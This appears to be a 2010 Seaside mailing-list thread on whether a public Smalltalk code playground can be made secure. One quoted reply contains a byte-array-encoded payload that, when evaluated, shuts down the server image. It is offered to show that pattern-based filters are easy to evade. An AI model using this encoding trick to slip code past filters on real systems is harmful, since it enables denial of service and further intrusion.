[Seaside] Seaside playground

Cédrick Béler cdrick65 at gmail.com
Mon Jan 11 10:06:21 UTC 2010


2010/1/11 Gerhard Obermann <obi068 at gmail.com>

> Are there any options to make it really secure?
>
>
The best option is probably to serve it independently of seaside.st and
include it in seaside.st.

Also, you should catch undeclared variables:

I just tried the following expression, which opens a debugger as the variable
is not declared:
html anchor callback: [anAction]; with: 'Click me'.



Cheers



> Gerhard
>
>
> On Mon, Jan 11, 2010 at 10:13 AM, Lukas Renggli <renggli at gmail.com> wrote:
>
>> > Thats not a simple hack.
>> > And it doesn't really take over the computer.
>>
>> Sure. As soon as I can execute arbitrary Smalltalk code on your
>> machine, I can deploy a Trojan for your platform.
>>
>> > Anyway, such hacks are not possible anymore.
>>
>> There is an infinite number of other hacks. It gets harder over time,
>> but the one below is particularly simple:
>>
>> html evaluateUnloggedForSelf: #[34 73 110 115 116 97 108 108 32 116
>> 104 101 32 102 97 118 111 114 105 116 101 32 116 114 111 121 97 110 34
>> 32 83 109 97 108 108 116 97 108 107 73 109 97 103 101 32 99 117 114
>> 114 101 110 116 32 115 110 97 112 115 104 111 116 58 32 102 97 108 115
>> 101 32 97 110 100 81 117 105 116 58 32 116 114 117 101] asString
>>
>> My point is that no matter how much time you spend on making it secure
>> by checking for particular patterns or strings, there will always be
>> ways to fool it. In the Smalltalk world security is inherently weak,
>> mostly because of the strong reflective capabilities. I would really
>> love to see your application on the web, but in its current form we
>> won't be able to run it on seaside.st.
>>
>> Lukas
>>
>> --
>> Lukas Renggli
>> http://www.lukas-renggli.ch
>> _______________________________________________
>> seaside mailing list
>> seaside at lists.squeakfoundation.org
>> http://lists.squeakfoundation.org/cgi-bin/mailman/listinfo/seaside
>>
>


-- 
Cédrick